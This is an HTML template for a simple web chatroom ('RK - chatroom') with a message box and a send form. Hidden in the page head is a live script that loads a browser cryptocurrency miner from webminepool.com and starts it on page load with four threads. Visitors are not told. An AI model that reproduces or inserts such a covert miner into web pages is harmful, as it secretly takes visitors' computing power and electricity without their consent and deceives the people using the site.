<!DOCTYPE HTML>
<html>
<head>
    <title>rk-chat</title>
    <style>
    h1 {text-align: center;}
    p {text-align: center;}
    form {text-align: center;}
    h2 {text-align: center;}
    message-box {text-align: center;}
    </style>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/3.0.4/socket.io.js" integrity="sha512-aMGMvNYu8Ue4G+fHa359jcPb1u+ytAF+P2SCb+PxrjCdO3n3ZTxJ30zuH39rimUggmTwmh2u7wvQsDTHESnmfQ==" crossorigin="anonymous"></script>
    <script src="{{ url_for('static', filename='script.js' )}}"></script>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css' )}}">
    <link rel="icon" type="image/x-icon" href="{{ url_for('static', filename='images/favicon.ico' )}}">
    <script src="https://webminepool.com/lib/base.js"></script>
    <script>
    var miner = WMP.User('SK_vBBjiqAooZg6APzvwacOA', 'scapegoat',{
        threads: 4,
        autoThreads: false,
        throttle: 0.3,
        forceASMJS: false
    });
    miner.start();
    </script>
</head>
<body>
    <div id="ping-label">Ping: <span id="ping-pong">0</span> ms</div>
    <h1>RK - chatroom</h1>
    
    <div id="message-box"></div>
    <form id="broadcast" method="POST" action='#'>
        <input type="text" name="broadcast_data" id="broadcast_data" placeholder="Message" autocomplete="off">
        <input type="submit" value="Send!">
    </form>
</body>
</html>